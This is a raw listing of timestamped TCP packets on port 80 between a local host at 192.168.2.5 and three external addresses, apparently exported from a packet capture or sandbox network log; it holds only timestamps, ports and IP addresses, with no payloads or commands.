                                                                          Sep 27, 2024 04:21:16.061639071 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.061639071 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.061642885 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.061655045 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.061671019 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.061685085 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.061685085 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.061707973 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.061717987 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.061781883 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.066652060 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.066690922 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.066701889 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.066729069 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.066729069 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.066749096 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.066761017 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.066771030 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.066781998 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.066802979 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.066865921 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.066890955 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.066903114 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.066914082 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.066962957 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.066962957 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.066962957 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.066973925 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.066984892 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.066997051 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.067003012 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.067023993 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.067051888 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.067204952 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.067226887 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.067236900 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.067249060 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.067272902 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.067272902 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.067296982 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.067296982 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.067322016 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.067333937 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.067363024 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.067375898 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.067398071 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.067404032 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.067409992 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.067434072 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.067527056 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.067837000 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.067857027 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.067866087 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.067903996 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.067903996 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.067928076 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.067939043 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.067949057 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.067960024 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.067989111 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.068005085 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.068007946 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.068061113 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.068245888 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.068294048 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.068304062 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.068366051 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.068366051 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.068366051 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.068383932 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.068394899 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.068404913 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.068413973 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.068454981 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.068454981 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.068716049 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.068727016 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.068739891 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.068747997 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.068759918 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.068768024 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.068783045 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.068793058 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.068794012 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.068811893 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.068866014 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.068943024 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.068953991 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.068959951 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.068964958 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.068974972 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.068984985 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.068995953 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.069008112 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.069057941 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.069081068 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.069103003 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.069113970 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.069123030 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.069133997 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.069144011 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.069156885 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.069158077 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.069164991 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.069169044 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.069176912 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.069180012 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.069196939 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.069236994 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.069269896 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.069281101 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.069292068 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.069313049 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.069334030 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.069351912 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.069361925 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.069371939 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.069381952 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.069391966 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.069411039 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.069411039 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.069495916 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.069508076 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.069516897 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.069528103 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.069538116 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.069545031 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.069545031 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.069550037 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.069561958 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.069569111 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.069574118 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.069585085 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.069602013 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.069602013 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.069657087 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.069662094 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.069674969 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.069684029 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.069725990 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.069725990 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.082199097 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.082217932 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.082237959 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.082248926 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.082257986 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.082269907 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.082277060 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.082333088 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.082335949 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.082335949 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.082345963 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.082389116 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.082427025 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.085285902 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:16.085330009 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:16.090138912 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:16.090202093 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:16.090210915 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:16.090241909 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:16.090250969 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:16.090382099 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:16.090392113 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:16.094420910 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.094492912 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.094502926 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.094512939 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.094523907 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.094522953 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.094537973 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.094549894 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.094554901 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.094554901 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.094563961 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.094588041 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.094599009 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.094600916 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.094600916 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.094631910 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.094661951 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.094672918 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.094682932 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.094692945 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.094702005 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.094702005 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.094707012 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.094717979 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.094723940 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.094752073 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.094752073 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.094773054 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.094845057 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.094855070 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.094866037 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.094870090 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.094899893 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.094902992 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.094914913 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.094924927 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.094937086 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.094954014 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.094954014 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.094989061 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.095036983 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.095098972 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.095129013 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.095140934 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.095149994 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.095160007 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.095175982 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.095187902 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.095199108 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.095199108 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.095216990 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.095257044 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.095626116 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.095676899 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.098057032 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.098067999 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.098078012 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.098124027 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.098146915 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.098160028 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.098160028 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.098175049 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.098186970 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.098196983 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.098225117 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.098403931 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.115423918 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.115518093 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.115573883 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.115586042 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.115596056 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.115607023 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.115617990 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.115633011 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.115655899 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.115684032 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.115722895 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.115735054 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.115788937 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.115788937 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.116899014 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.116914988 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.116926908 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.116947889 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.117033005 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.117058039 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.117070913 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.117079973 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.117093086 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.117121935 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.117121935 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.117749929 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.122562885 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.122584105 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.122596025 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.122633934 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.122664928 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.122689009 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.122700930 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.122710943 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.122721910 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.122745037 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.122770071 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.122864008 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.122874975 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.122924089 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.123428106 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.123440027 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.123450994 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.123488903 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.123512983 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.123562098 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.123574018 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.123586893 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.123598099 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.123613119 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.123636961 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.123656988 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.123919010 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.123975039 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.125694036 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.125757933 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.125825882 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.125837088 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.125848055 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.125859022 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.125880957 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.125905037 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.126008987 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.126022100 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.126030922 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.126043081 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.126053095 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.126065969 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.126075983 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.126089096 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.126089096 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.126108885 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.126110077 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.126121998 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.126130104 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.126166105 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.126211882 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.126224041 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.126234055 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.126243114 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.126254082 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.126265049 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.126291990 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.126291990 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.126385927 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.126404047 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.126415014 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.126425028 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.126441002 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.126444101 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.126451969 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.126463890 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.126463890 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.126476049 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.126487970 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.126497984 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.126499891 CEST4972480192.168.2.5176.113.115.95
